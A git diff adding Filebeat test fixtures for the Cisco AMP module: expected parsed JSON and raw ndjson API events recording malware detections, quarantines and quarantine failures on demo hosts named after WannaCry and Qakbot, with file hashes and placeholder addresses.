"cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 94442, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 95628, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 96814, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 98000, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 99186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 100372, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 105894, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 107014, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064596", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 377000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 108200, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064594", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 33000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 109386, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log new file mode 100644 index 000000000000..dc134052124e --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log @@ -0,0 +1,62 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 